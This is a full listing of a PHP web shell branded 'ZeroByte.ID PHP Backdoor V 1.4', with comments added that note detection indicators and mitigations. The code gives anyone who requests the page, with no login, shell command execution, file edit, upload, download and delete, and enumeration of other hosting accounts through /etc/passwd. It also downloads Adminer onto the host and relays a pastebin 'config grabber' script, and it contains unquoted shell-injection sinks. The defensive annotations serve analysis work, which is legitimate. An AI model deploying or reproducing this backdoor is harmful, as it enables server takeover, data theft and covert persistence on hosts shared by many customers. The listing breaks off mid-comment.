  1. <?php
  // Removes the execution time limit and sets the error-reporting level to 0
  // for every request served by this file, so long-running actions are not cut
  // off and PHP errors raised by the code below are not reported.
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  // exect($cmd): OS command execution helper and the central command sink of this file.
  // Tries system(), exec(), passthru() and shell_exec() in that order and uses
  // the first one function_exists() reports as available. Output is captured
  // (output buffering for system/passthru, the $results array for exec) and
  // returned as a string; if none of the four is available nothing is returned.
  // Every call is prefixed with @, so warnings from a failing call are hidden.
  // Callers in this file pass request-derived strings ($_POST['cmd'],
  // $_GET['file'], $_GET['gzname']) without quoting or validation.
  // Defensive note: the page prints the host's disable_functions value itself;
  // a hardened disable_functions list covering these four names is the
  // host-side control this fallback chain is probing for.
  5. function exect($cmd) {
  6. if(function_exists('system')) {
  7. @ob_start();
  8. @system($cmd);
  9. $exect = @ob_get_contents();
  10. @ob_end_clean();
  11. return $exect;
  12. } elseif(function_exists('exec')) {
  13. @exec($cmd,$results);
  14. $exect = "";
  // exec() returns output as an array of lines; they are joined with no separator.
  15. foreach($results as $result) {
  16. $exect .= $result;
  17. } return $exect;
  18. } elseif(function_exists('passthru')) {
  19. @ob_start();
  20. @passthru($cmd);
  21. $exect = @ob_get_contents();
  22. @ob_end_clean();
  23. return $exect;
  24. } elseif(function_exists('shell_exec')) {
  25. $exect = @shell_exec($cmd);
  26. return $exect;
  27. }
  28. }
  29.  
  30.  
  // fperms($filen): echoes the permission bits of $filen as an "rwxrwxrwx"-style
  // string wrapped in <center><small>. Nothing is returned.
  // The three triplets are owner (0x0100/0x0080/0x0040), group
  // (0x0020/0x0010/0x0008) and other (0x0004/0x0002/0x0001); the execute column
  // also encodes setuid (0x0800), setgid (0x0400) and sticky (0x0200) as
  // s/S and t/T.
  // $fpermsinfo is appended to without being initialised first; the resulting
  // notice is not shown because error reporting is set to 0 at the top of the file.
  31. function fperms($filen) {
  32. $perms = fileperms($filen);
  33. $fpermsinfo .= (($perms & 0x0100) ? 'r' : '-');
  34. $fpermsinfo .= (($perms & 0x0080) ? 'w' : '-');
  35. $fpermsinfo .= (($perms & 0x0040) ?
  36. (($perms & 0x0800) ? 's' : 'x' ) :
  37. (($perms & 0x0800) ? 'S' : '-'));
  38. $fpermsinfo .= (($perms & 0x0020) ? 'r' : '-');
  39. $fpermsinfo .= (($perms & 0x0010) ? 'w' : '-');
  40. $fpermsinfo .= (($perms & 0x0008) ?
  41. (($perms & 0x0400) ? 's' : 'x' ) :
  42. (($perms & 0x0400) ? 'S' : '-'));
  43. $fpermsinfo .= (($perms & 0x0004) ? 'r' : '-');
  44. $fpermsinfo .= (($perms & 0x0002) ? 'w' : '-');
  45. $fpermsinfo .= (($perms & 0x0001) ?
  46. (($perms & 0x0200) ? 't' : 'x' ) :
  47. (($perms & 0x0200) ? 'T' : '-'));
  48. echo '<center><small>'.$fpermsinfo.'</small></center>';
  49. }
  50.  
  // eof(): echoes a hex-escaped string literal that decodes to "www.zerobyte.id"
  // (used as the footer link text). Presumably written as \x escapes so the
  // plain string does not appear in the file; signature matching on this file
  // should therefore cover the escaped form as well as the decoded one.
  51. function eof() {echo "\x77\x77\x77\x2e\x7a\x65\x72\x6f\x62\x79\x74\x65\x2e\x69\x64";}
  52. ?>
  53. <title>ZeroByte.ID PHP Backdoor V 1.4</title>
  54. <link href='//fonts.googleapis.com/css?family=Share+Tech+Mono' rel='stylesheet' type='text/css'>
  55. <style type="text/css">
  56. body {
  57. font-family: courier;
  58. background: #f2f2f2;
  59. font-size: 1px;
  60. }
  61. h1 a {
  62. font-weight: normal;
  63. font-family: 'Share Tech Mono';
  64. font-size: 20px;
  65. color:#006600;
  66. text-decoration: none;
  67. margin: 0px;
  68. }
  69. h2 {
  70. font-size: 20px;
  71. color: #006600;
  72. text-align: center;
  73. padding-top: 5px;
  74. margin: 0;
  75. margin-top: 10px;
  76. }
  77. .menu {
  78. text-align: center;
  79. font-size: 12px;
  80. border-bottom: 1px dashed #006600;
  81. padding-bottom: 5px;
  82. margin-bottom: 10px;
  83. }
  84. .menu a {
  85. margin-top: 2px;
  86. color: #006600;
  87. text-decoration: none;
  88. display: inline-block;
  89. }
  90. .container {
  91. font-size: 12px;
  92. }
  93. .filemgr {
  94. font-size: 12px;
  95. width: 100%
  96. }
  97. .filemgr td {
  98. padding: 3px;
  99. border-bottom: 1px dashed #006600;
  100. }
  101. .filemgr a{
  102. text-decoration: none;
  103. color:#006600;
  104. }
  105. tr:hover {
  106. background: #cccccc;
  107. }
  108. .tdtl {
  109. background:#006600;color:#ffffff;text-align:center;font-weight:bold;
  110. }
  111. .footer {
  112. text-align: center;
  113. border-radius: 30px;
  114. margin-top: 25px;
  115. border-top: 1px double #006600;
  116. padding: 5px;
  117. }
  118. .footer a {
  119. color: #006600;
  120. text-decoration: none;
  121. }
  122. p {
  123. word-wrap: break-word;
  124. margin:2;
  125. }
  126. a {
  127. text-decoration: none;
  128. color: #006600;
  129. }
  130. .act {
  131. text-align: center;
  132. }
  133. .txarea {
  134. width:100%;
  135. height:200px;
  136. background:transparent;
  137. border:1px solid #006600;
  138. padding:1px;color:#006600;
  139. }
  140. h4 {
  141. margin:0;
  142. }
  143. </style>
  144. <div class="container">
  145. <div style="position:relative;width: 100%;margin-bottom: 5px;border-bottom: 1px dashed #006600;">
  146. <div style="float: left;width: 15%;text-align: center;border: 1px dashed #006600;margin-bottom: 5px;">
  147. <h1><a href="?">ZeroByte.ID<br><small>Shell V 1.4</small></a></h1>
  148. </div>
  149. <div style="float: right;width: 83%;">
  150. <?php
  // Host fingerprinting banner, rendered on every page load.
  // Prints php_uname(), reports whether mysql_connect() and curl_version() exist,
  // and runs `wget --help`, `perl --help` and `gcc --help` through exect() to see
  // whether those binaries produce output. It also prints the disable_functions
  // ini value.
  // Detection note: each page view makes the PHP/web-server process spawn those
  // three commands, which is a process-lineage pattern worth alerting on.
  151. echo php_uname();
  152. $mysql = (function_exists('mysql_connect')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  153. $curl = (function_exists('curl_version')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  154. $wget = (exect('wget --help')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  155. $perl = (exect('perl --help')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  156. $gcc = (exect('gcc --help')) ? "<font color=#006600>ON</font>" : "<font color=red>OFF</font>";
  157. $disfunc = @ini_get("disable_functions");
  158. $show_disf = (!empty($disfunc)) ? "<font color=red>$disfunc</font>" : "<font color=#006600>NONE</font>";
  159. echo '<br>[ MySQL: '.$mysql.' ][ Curl: '.$curl.' ][ Wget: '.$wget.' ][ Perl: '.$perl.' ][ Compiler: '.$gcc.' ]';
  160. echo '<p>Disable Function: '.$show_disf;
  161.  
  162. ?>
  163. </div>
  164. <div style="clear: both;"></div>
  165. </div>
  166.  
  167. <?php
  // Working-directory selection, taken straight from the query string.
  // $dir is the directory that gets listed: getcwd() when there are no GET
  // parameters at all, otherwise $_GET['path'] (which may be unset).
  // $offdir is the "current location" carried between pages: path, else the
  // directory of file, else lastpath, else getcwd().
  // No value is validated or confined to a base directory, and no
  // authentication or session check appears anywhere in this listing.
  168. if(empty($_GET)) {
  169. $dir = getcwd();
  170. }
  171. else {
  172. $dir = $_GET['path'];
  173. }
  174.  
  175. if(!empty($_GET['path'])) {$offdir = $_GET['path'];}
  176. else if(!empty($_GET['file'])) {$offdir = dirname($_GET['file']);}
  177. else if(!empty($_GET['lastpath'])) {$offdir = $_GET['lastpath'];}
  178. else {$offdir = getcwd();}
  179.  
  180. ?>
  181. <div class="menu">
  182. <a href="?ext=jumpusr&lastpath=<?php echo $offdir;?>">[ Readable User ]</a>
  183. <a href="?ext=sql_interface&lastpath=<?php echo $offdir;?>">[ SQL Interface ]</a>
  184. <a href="?ext=shellcmd&lastpath=<?php echo $offdir;?>">[ Shell Command ]</a>
  185. <a href="?ext=vdomain&lastpath=<?php echo $offdir;?>">[ Shows vDomain ]</a>
  186. <a href="?ext=stoolkit&lastpath=<?php echo $offdir;?>">[ Other Toolkit ]</a>
  187. <a href="?ext=uploader&lastpath=<?php echo $offdir;?>">[ Uploader ]</a>
  188. </div>
  189. <?php
  190. ## CURRENT DIR ##
  // Breadcrumb for $offdir: backslashes are normalised to "/", the path is split
  // on "/", and each component becomes a link whose ?path= value is the path up
  // to and including that component.
  // The components come from the request and are echoed without HTML escaping.
  191. echo '<div style="margin-bottom:10px;">';
  192. echo '<span style="border:1px dashed #009900;padding:2px;">';
  193. $lendir = str_replace("\\","/",$offdir);
  194. $xlendir = explode("/", $lendir);
  195. foreach($xlendir as $c_dir => $cdir) {
  196. echo "<a href='?path=";
  // Re-join components 0..$c_dir to form the link target for this crumb.
  197. for($i = 0; $i <= $c_dir; $i++) {
  198. echo $xlendir[$i];
  199. if($i != $c_dir) {
  200. echo "/";
  201. }
  202. }
  203. echo "'>$cdir</a>/";
  204. }
  205. echo '</span></div>';
  206. ## EOF CURRENT DIR ##
  207.  
  // File manager listing for $dir (request-controlled, see the path selection above).
  // scandir() output is split into directories and files, then rendered as a
  // table: directories first, each with RENAME/DELETE links; files with
  // EDIT/RENAME/DELETE/DOWNLOAD links. Names matching /(tar.gz)$/ get an
  // "EXTRACT TO TMP" link instead of the view/edit links.
  // Every link carries the full path in the query string (?path=, ?file=,
  // ?gzname=) together with ?action= or ?ext=, so use of this page leaves
  // filesystem paths and those parameter names in the web server access log.
  // Names and paths are written into the HTML without escaping.
  208. if(!empty($dir)) {
  209. echo '<table class="filemgr">';
  210. echo '<tr><td class="tdtl">Name</td><td class="tdtl" width="9%">Permission</td><td class="tdtl" width="18%">Action</td></tr>'."\n";
  211. $directories = array();
  212. $files_list = array();
  213. $files = scandir($dir);
  // Partition entries, skipping "." and "..".
  214. foreach($files as $file){
  215. if(($file != '.') && ($file != '..')){
  216. if(is_dir($dir.'/'.$file)){
  217. $directories[] = $file;
  218.  
  219. } else{
  220. $files_list[] = $file;
  221.  
  222. }
  223. }
  224. }
  225.  
  // Directory rows: navigation link, permission string, rename/rmdir actions.
  226. foreach($directories as $directory){
  227. echo '<tr><td><span class="dbox">[D]</span> <a href="?path='.$dir.'/'.$directory.'">'.$directory.'/</a></td>'."\n";
  228. echo '<td>';
  229. fperms($dir.'/'.$directory);
  230. echo '</td>'."\n";
  231. echo '<td class="act">';
  232. echo '<a href="?action=rename&file='.$dir.'/'.$directory.'" class="act">RENAME</a> ';
  233. echo '<a href="?action=rmdir&file='.$dir.'/'.$directory.'" class="act">DELETE</a>';
  234. echo '</td>'."\n";
  235. echo '</tr>'."\n";
  236. }
  // File rows: archives get the extract link, everything else gets view/edit.
  237. foreach($files_list as $filename){
  238. if(preg_match('/(tar.gz)$/', $filename)) {
  239. echo '<tr><td><span class="dbox">[F]</span> <a href="#" class="act">'.$filename.'</a>'."\n";
  240. echo ' <a href="?ext=extract2tmp&gzname='.$dir.'/'.$filename.'" style="background:#006600;color:#ffffff;padding:1px;padding-left:5px;padding-right:5px;">EXTRACT TO TMP</a>';
  241. echo '</td>'."\n";
  242. echo '<td>';
  243. fperms($dir.'/'.$filename);
  244. echo '</td>'."\n";
  245. echo '<td class="act">';
  246. echo '<a href="?action=rename&file='.$dir.'/'.$filename.'" class="act">RENAME</a> ';
  247. echo '<a href="?action=delete&file='.$dir.'/'.$filename.'" class="act">DELETE</a> ';
  248. echo '<a href="?action=download&file='.$dir.'/'.$filename.'" class="act">DOWNLOAD</a>';
  249. echo '</td>'."\n";
  250. echo '</tr>'."\n";
  251. }
  252. else {
  253. echo '<tr><td><span class="dbox">[F]</span> <a href="?action=view&file='.$dir.'/'.$filename.'" class="act">'.$filename.'</a></td>'."\n";
  254. echo '<td>';
  255. fperms($dir.'/'.$filename);
  256. echo '</td>'."\n";
  257. echo '<td class="act">';
  258. echo '<a href="?action=edit&file='.$dir.'/'.$filename.'" class="act">EDIT</a> ';
  259. echo '<a href="?action=rename&file='.$dir.'/'.$filename.'" class="act">RENAME</a> ';
  260. echo '<a href="?action=delete&file='.$dir.'/'.$filename.'" class="act">DELETE</a> ';
  261. echo '<a href="?action=download&file='.$dir.'/'.$filename.'" class="act">DOWNLOAD</a>';
  262. echo '</td>'."\n";
  263. echo '</tr>'."\n";
  264. }
  265. }
  266. echo '</table>';
  267. }
  268.  
  269.  
  // Dispatcher for ?action=. Each branch operates on the path in $_GET['file']
  // with whatever rights the PHP process has; the path is never validated.
  // For incident response, requests carrying action=edit|rename|delete|rmdir
  // are the ones that modified the filesystem, and action=view|download the
  // ones that disclosed file contents.
  //
  // edit: on POST "save", overwrites the file with $_POST['src'], then shows the
  // current contents in a textarea (HTML-escaped).
  270. if($_GET['action'] == 'edit') {
  271. if($_POST['save']) {
  272. $save = file_put_contents($_GET['file'], $_POST['src']);
  273. if($save) {
  274. $act = "<font color=#006600>Successed!</font>";
  275. } else {
  276. $act = "<font color=red>Permission Denied!</font>";
  277. }
  278. echo "".$act."<br>";
  279. }
  280. echo "Filename: <font color=#006600>".basename($_GET['file'])."</font>";
  281. echo "<form method='post'>
  282. <textarea name='src' class='txarea'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  283. <input type='submit' value='Save' name='save' style='width: 20%;background:#006600;border:none;color:#f2f2f2;margin-top:5px;height:30px;'>
  284. </form>";
  285. }
  // view: read-only display of the file contents (HTML-escaped).
  286. else if($_GET['action'] == 'view') {
  287. echo "Filename: <font color=#006600>".basename($_GET['file'])."</font>";
  288. echo "<textarea class='txarea' style='height:400px;' readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  289. }
  // rename: on POST "do_rename", renames the file to $offdir/<posted name>.
  // htmlspecialchars() is applied to the new name; that is HTML encoding, not
  // path validation.
  290. else if($_GET['action'] == 'rename') {
  291. $path = $offdir;
  292. if($_POST['do_rename']) {
  293. $rename = rename($_GET['file'], "$path/".htmlspecialchars($_POST['rename'])."");
  294. if($rename) {
  295. $act = "<font color=#006600>Successed!</font>";
  296. } else {
  297. $act = "<font color=red>Permission Denied!</font>";
  298. }
  299. echo "".$act."<br>";
  300. }
  301. echo "Filename: <font color=#006600>".basename($_GET['file'])."</font>";
  302. echo "<form method='post'>
  303. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  304. <input type='submit' name='do_rename' value='rename'>
  305. </form>";
  306. }
  // delete: unlink() runs as soon as the URL is requested (GET, no confirmation).
  // Only the failure case sets a message; on success $act is unset and nothing is printed.
  307. else if($_GET['action'] == 'delete') {
  308. $path = $offdir;
  309. $delete = unlink($_GET['file']);
  310. if($delete) {
  311.  
  312. } else {
  313. $act = "<font color=red>Permission Denied!</font>";
  314. }
  315. echo $act;
  // rmdir: tries rmdir(); if that fails, falls back to `rm -rf` through exect()
  // with $_GET['file'] concatenated unquoted into the shell command line, so this
  // branch is a shell-injection sink as well as a recursive delete.
  316. } else if($_GET['action'] == 'rmdir') {
  317. $path = $offdir;
  318. $delete = rmdir($_GET['file']);
  319. if($delete) {
  320. echo '<font color=#006600>Deleted!</font><br>';
  321. } else {
  322. echo "\n<font color=red>Error remove dir, try to force delete!</font>\n<br>";
  323. exect('rm -rf '.$_GET['file']);
  324. if(file_exists($_GET['file'])) {
  325. echo '<font color=red>Permission Denied!</font>';
  326. } else
  327. {
  328. echo '<font color=#006600>Deleted!</font>';
  329. }
  330. }
  331.  
  // download: streams the file as an attachment (application/octet-stream) and
  // exits. Response size in the access log approximates the size of the file taken.
  332. } else if($_GET['action'] == 'download') {
  333. @ob_clean();
  334. $file = $_GET['file'];
  335. header('Content-Description: File Transfer');
  336. header('Content-Type: application/octet-stream');
  337. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  338. header('Expires: 0');
  339. header('Cache-Control: must-revalidate');
  340. header('Pragma: public');
  341. header('Content-Length: ' . filesize($file));
  342. readfile($file);
  343. exit;
  344. }
  345.  
  346. #### EOF #####
  347.  
  // ext=jumpusr: menu page linking to the two cross-account enumeration views
  // (ext=jpublic_html and ext=backupwordpress). $_GET['lastpath'] is echoed
  // into the link targets without escaping.
  348. if($_GET['ext'] == 'jumpusr') {
  349.  
  350. echo '<h2>.::[ Readable User Path ]::.</h2>';
  351. echo "<br><center>";
  352. echo "[ <a href=\"?ext=jpublic_html&lastpath=".$_GET['lastpath']."\">/home/user/public_html</a> ]\n";
  353. echo "[ <a href=\"?ext=backupwordpress&lastpath=".$_GET['lastpath']."\">/home/user/backupwordpress</a> ]\n";
  354. echo "</center>";
  355.  
  356. }
  357.  
  358. ###################
  359.  
  // ext=jpublic_html: cross-account enumeration on a shared host.
  // Reads /etc/passwd line by line, takes the text before ":x:" as a username,
  // and tests /home/<user>/public_html with is_readable()/is_writable(). Hits are
  // listed as [R] or [RW] links into the file manager, followed by a total and
  // the address that $_SERVER['HTTP_HOST'] resolves to.
  // Mitigation note: this only finds anything where the PHP process can read
  // other accounts' home directories; per-account process isolation, restrictive
  // home-directory permissions and open_basedir are the controls that make it
  // come back empty.
  360. if($_GET['ext'] == 'jpublic_html') {
  361. echo '<h2>.::[ Readable public_html ]::.</h2>';
  362. $i = 0;
  363. echo "<pre><div class='margin: 5px auto;'>";
  364. $etc = fopen("/etc/passwd", "r");
  365. while($passwd = fgets($etc)) {
  366. if($passwd == '' || !$etc) {
  367. echo "<center><font color=red>Can't read /etc/passwd</font></center>";
  368. } else {
  369. preg_match_all('/(.*?):x:/', $passwd, $user);
  370. foreach($user[1] as $users) {
  371. $user_dir = "/home/$users/public_html";
  372. if(is_readable($user_dir)) {
  373. $i++;
  374. $jrw = "[R] <a href='?path=$user_dir'>/home/$users/public_html</a>";
  375. if(is_writable($user_dir)) {
  376. $jrw = "[RW] <a href='?path=$user_dir'>/home/$users/public_html</a>";
  377. }
  378. echo $jrw."\n";
  379.  
  380. }
  381. }
  382. }
  383. }
  384. if($i == 0) {
  385. echo '<center><font color=red>public_html which readable is null in this host!</font></center>';
  386. } else {
  387. echo "<br>Total ".$i." Users in ".gethostbyname($_SERVER['HTTP_HOST'])."";
  388. }
  389. echo "</div></pre>";
  390. }
  391. #####################
  // ext=backupwordpress: same enumeration as ext=jpublic_html, but the directory
  // tested for every /etc/passwd user is /home/<user>/backupwordpress.
  // NOTE(review): presumably targets per-account WordPress backup directories;
  // the listing itself only shows the readable/writable test and the link output.
  // A backup directory readable by other accounts' web processes is the
  // exposure being looked for; it should not be world-readable.
  392. if($_GET['ext'] == 'backupwordpress') {
  393. echo '<h2>.::[ Readable Backupwordpress ]::.</h2>';
  394. $i = 0;
  395. echo "<pre><div class='margin: 5px auto;'>";
  396. $etc = fopen("/etc/passwd", "r");
  397. while($passwd = fgets($etc)) {
  398. if($passwd == '' || !$etc) {
  399. echo "<center><font color=red>Can't read /etc/passwd</font></center>";
  400. } else {
  401. preg_match_all('/(.*?):x:/', $passwd, $user);
  402. foreach($user[1] as $users) {
  403. $user_dir = "/home/$users/backupwordpress";
  404. if(is_readable($user_dir)) {
  405. $i++;
  406. $jrw = "[R] <a href='?path=$user_dir'>/home/$users/backupwordpress</a>";
  407. if(is_writable($user_dir)) {
  408. $jrw = "[RW] <a href='?path=$user_dir'>/home/$users/backupwordpress</a>";
  409. }
  410. echo $jrw."\n";
  411.  
  412. }
  413. }
  414. }
  415. }
  416. if($i == 0) {
  417. echo '<center><font color=red>backupwordpress is null in this host!</font></center>';
  418. } else {
  419. echo "<br>Total ".$i." Users in ".gethostbyname($_SERVER['HTTP_HOST'])."";
  420. }
  421. echo "</div></pre>";
  422. }
  423. #####################
  // ext=vdomain: lists hosted domains and their owning accounts.
  // vdomain($domaindir) scans the given directory, skips entries that start with
  // "*" or "." or end in a digit, obtains each entry's owner by running
  // `ls -l ... | awk '{print $3}'` through exec(), and reports whether
  // /home/<owner>/backupwordpress is readable.
  // The directory used is /etc/vfilters/ if readable, otherwise /etc/valiases/.
  // NOTE(review): these look like mail-routing directories of a hosting control
  // panel with one file per domain; confirm for the platform in question.
  // Detection note: one `ls -l | awk` child process is spawned per listed entry.
  424. if($_GET['ext'] == 'vdomain') {
  425. echo '<center>';
  426. function vdomain($domaindir) {
  427. $domainfile = scandir($domaindir);
  428. $i = 0;
  429. echo "<table width='80%'>\n";
  430. echo "<tr><th>Domain</th><th>User</th><th>Jump BW</th></tr>";
  431. foreach($domainfile as $domain){
  432. $i++;
  433. if(!is_dir($domain) && !preg_match('/^[*.]/', $domain) && !preg_match('/[0-9]$/', $domain)) {
  434. $user = exec("ls -l $domaindir$domain | awk '{print $3}'");
  435. echo '<tr><td>'.$domain.'</td><td width="15%" align="center"><small>'.$user.'</small></td>';
  436. if(is_readable("/home/$user/backupwordpress")){
  437. echo '<td width="13%" align="center">Yes</td>';
  438. } else {
  439. echo '<td width="13%"><center><font color="red">No</font></center></td>';
  440. }
  441. echo '</tr>';
  442. }
  443. }
  444. echo "</table>\n";
  445. echo "Total $i Domains.";
  446. }
  447.  
  448. if(is_readable("/etc/vfilters/")) {
  449. $domaindir = '/etc/vfilters/';
  450. vdomain($domaindir);
  451. }
  452. else if(is_readable("/etc/valiases/")) {
  453. $domaindir = '/etc/valiases/';
  454. vdomain($domaindir);
  455. } else {
  456. echo "<h3 style=\"color:red;\">vDomain Is Empty!</h3>";
  457. }
  458. echo '</center>';
  459. }
  460.  
  461. ### EXTRACTOR TO TMP ###
  // ext=extract2tmp: unpacks the archive named in $_GET['gzname'] into a temp directory.
  // The target is the first existing, writable one of <DOCUMENT_ROOT>/tmp/,
  // <parent of DOCUMENT_ROOT>/tmp/ and /tmp/. On POST "extract" a subdirectory
  // named after the archive's basename (text before the first ".") is created
  // with `mkdir` and the archive is unpacked with `tar -xzvf ... -C ...`, both
  // through exect().
  // $_GET['gzname'] and the derived directory name are concatenated unquoted
  // into those command lines, so this branch is a shell-injection sink in
  // addition to writing attacker-chosen files under the temp directory.
  // Detection note: mkdir/tar children of the web-server process and new
  // directories under the three tmp locations are the artefacts to look for.
  462. else if($_GET['ext'] == 'extract2tmp')
  463. {
  464. if (file_exists($_SERVER["DOCUMENT_ROOT"].'/tmp/') && is_writable($_SERVER["DOCUMENT_ROOT"].'/tmp/')) {
  465. $tmppath = $_SERVER["DOCUMENT_ROOT"].'/tmp/';
  466. }
  467. else if(file_exists(dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/') && is_writable(dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/')) {
  468. $tmppath = dirname($_SERVER["DOCUMENT_ROOT"]).'/tmp/';
  469. }
  470. else if(file_exists('/tmp/') && is_writable('/tmp/')) {
  471. $tmppath = '/tmp/';
  472. }
  473. else {
  474. $tmppath = '';
  475. }
  476.  
  477. if(!empty($tmppath)) {
  478. $gzfile = $_GET['gzname'];
  479. echo '[FILE] '.$gzfile.'<br>';
  480. echo '-- extract to --<br>';
  481. echo '[TMP] '.$tmppath.'<br>';
  482. $bsname = basename($gzfile);
  483. $gzrname = explode(".", $bsname);
  484. echo '<form method="post" action="">';
  485. echo '<input name="extract" type="submit" value="EXTRACT">';
  486. echo '</form>';
  487. if(!empty($_POST['extract'])) {
  488. exect('mkdir '.$tmppath.$gzrname[0]);
  489. $destdir = $tmppath.$gzrname[0];
  490. if (file_exists($destdir) && is_writable($destdir)) {
  491. echo "\n".'[EXTRACTED] <a href="?path='.$destdir.'">'.$destdir.'</a>'."\n";
  492. exect('tar -xzvf '.$gzfile.' -C '.$destdir);
  493. }
  494. else
  495. {
  496. echo 'FAILED!';
  497. }
  498. }
  499. }
  500. else {
  501. echo 'CANNOT EXTRACT TO TMP!';
  502. }
  503.  
  504. }
  505. ### EXTRACTOR TO TMP - EOF ###
  506.  
  507. ### CMD ###
  // ext=shellcmd: the interactive command page. $_POST['cmd'] is handed to
  // exect() unchanged and the output is echoed into a read-only textarea without
  // HTML escaping.
  // The command travels in the POST body, so access logs show only a POST to
  // this file with ext=shellcmd in the query string; the command text itself is
  // visible only where request bodies are captured (WAF/audit logging) or via
  // host process telemetry showing shells spawned by the web-server process.
  508. else if($_GET['ext'] == 'shellcmd')
  509. {
  510. echo '<h2>.::[ Shell Command ]::.</h2>';
  511. echo '<form method="post" action="">';
  512. echo 'terminal:~$ <input name="cmd" type="text" placeholder="echo zerobyte" style="width:300px"/>';
  513. echo ' <input type="submit" value=">>"/>';
  514. echo '</form>';
  515. if(!empty($_POST['cmd'])) {
  516. echo '<textarea style="width:100%;height:150px;" readonly>';
  517. $cmd = $_POST['cmd'];
  518. echo exect($cmd);
  519. echo '</textarea>';
  520. }
  521. }
  522. ### CMD EOF ###
  523.  
  524. ### UPLOADER ###
  // ext=uploader: file drop. On POST "postupl", the uploaded file (form field
  // "zerofile") is copied from its temporary location to $offdir/<client-supplied
  // file name>. Neither the name nor the content type is checked, $offdir comes
  // from the request, and copy() failures are hidden by @.
  // Detection note: multipart POSTs to this file with ext=uploader, followed by
  // new files appearing in web-served directories, mark additional payloads
  // placed through this page.
  525. else if($_GET['ext'] == 'uploader')
  526. {
  527. echo '<h2>.::[ Uploader ]::.</h2>';
  528. echo '<center>';
  529. echo '<form method=post enctype=multipart/form-data>';
  530. echo '<br><br>PATH ['.$offdir.']<br>';
  531. echo '<input type="file" name="zerofile"><input name="postupl" type="submit" value="Upload"><br>';
  532. echo '</form>';
  533. if($_POST["postupl"] == 'Upload')
  534. {
  535. if(@copy($_FILES["zerofile"]["tmp_name"],"$offdir/".$_FILES["zerofile"]["name"]))
  536. { echo '<b>OK! '."$offdir/".$_FILES["zerofile"]["name"].'</b>'; }
  537. else
  538. { echo '<b>Upload Failed.</b>'; }
  539. }
  540. echo '</center>';
  541. }
  542. ### UPLOADER EOF ###
  543.  
  544. ### MYSQL INTERFACE ###
  // ext=sql_interface: fetches a database administration tool onto the host.
  // On POST "mysql_int", call_adminer() downloads Adminer 4.3.1 from adminer.org
  // with cURL and writes it to z-adminer.php in the current working directory,
  // then a link to that file is printed.
  // Indicators from this branch: a file named z-adminer.php next to the shell,
  // and an outbound HTTPS request from the web server to www.adminer.org.
  // A dropped Adminer copy remains reachable by anyone who requests its URL
  // until it is removed, independent of this file.
  545. else if($_GET['ext'] == 'sql_interface')
  546. {
  547. echo '<h2>.::[ MySQL Interface ]::.</h2>';
  548. echo '<center>';
  549. $dwadminer = 'https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php';
  550. $fileadminer = 'z-adminer.php';
  // call_adminer($dwadminer, $fileadminer): downloads the URL into the named
  // file via CURLOPT_FILE and returns the curl_exec() result.
  // CURLOPT_SSL_VERIFYPEER is set to false, so the TLS certificate of the
  // download host is not verified.
  // Every statement after the return is never executed.
  551. function call_adminer($dwadminer, $fileadminer) {
  552. $fp = fopen($fileadminer, "w+");
  553. $ch = curl_init();
  554. curl_setopt($ch, CURLOPT_URL, $dwadminer);
  555. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  556. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  557. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  558. curl_setopt($ch, CURLOPT_FILE, $fp);
  559. return curl_exec($ch);
  560. curl_close($ch);
  561. fclose($fp);
  562. ob_flush();
  563. flush();
  564. file_put_contents($dwadminer, $fileadminer);
  565. }
  566. echo '<form method=post enctype=multipart/form-data>';
  567. echo '<input name="mysql_int" type="submit" value="Call Adminer 4.3.1"><br>';
  568. echo '</form>';
  569. if($_POST['mysql_int'] == 'Call Adminer 4.3.1') {
  570. call_adminer($dwadminer, $fileadminer);
  // The link is built from the request's Host header and PHP_SELF.
  571. $linkz = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://$_SERVER[HTTP_HOST]";
  572. if(file_exists('z-adminer.php')) {
  573. echo '<a href="'.$linkz.dirname($_SERVER['PHP_SELF']).'/'.$fileadminer.'" target="_blank">Adminer OK!</a>';
  574. }
  575. else {
  576. echo '<font color="red">[FAILED]</font>';
  577. }
  578.  
  579. }
  580. echo '</center>';
  581. }
  582. ### MYSQL INTERFACE EOF ###
  583.  
  584.  
  // ext=stoolkit: relays a companion script to the operator's browser.
  // On POST "backupwpsh", the server fetches https://pastebin.com/raw/i9WYErLw
  // with file_get_contents() and returns the body as an attachment named
  // backupwp.sh (Content-Type text/plain), then exits.
  // The script's contents are not part of this listing; the page labels it
  // "Backupwordpress Config Grabber & Auto Edit User [ BASH ]".
  // Indicator from this branch: an outbound request from the web server to that
  // pastebin.com raw URL.
  585. else if($_GET['ext'] == 'stoolkit')
  586. {
  587. echo '<h2>.::[ Support Toolkit ]::.</h2>';
  588. echo '<center>';
  589. echo '<div style="text-align:left;">';
  590. echo '<form method=post enctype=multipart/form-data>';
  591. echo '<big>Backupwordpress Config Grabber & Auto Edit User</big> [ BASH ]<br>';
  592. echo '<input name="backupwpsh" type="submit" value="Download Here!">';
  593. echo '</form>';
  594. echo '</div>';
  595. if($_POST['backupwpsh']) {
  596. @ob_clean();
  597. $file = "https://pastebin.com/raw/i9WYErLw";
  598. header('Content-Description: File Transfer');
  599. header('Content-Type: text/plain');
  600. header('Content-Disposition: attachment; filename="backupwp.sh"');
  601. header('Expires: 0');
  602. header('Cache-Control: must-revalidate');
  603. header('Pragma: public');
  604. header('Content-Length: ' . filesize($file));
  605. echo (file_get_contents($file));
  606. exit;
  607. }
  608. echo '</center>';
  609. }
  610. ### MYSQL INTERFACE EOF ###
  611.  
  612. ### BACKUPWORDPRESS BASH ADD-ON ###
  // Endpoints selected by ?grab=, with no HTML form in this file.
  // NOTE(review): presumably called by the external backupwp.sh script.
  // Database host, user, password and name are taken from the POST body.
  //
  // grab=wp_options: connects with the legacy mysql_* API, finds one table whose
  // name ends in "_options" in the given schema, and prints the siteurl option
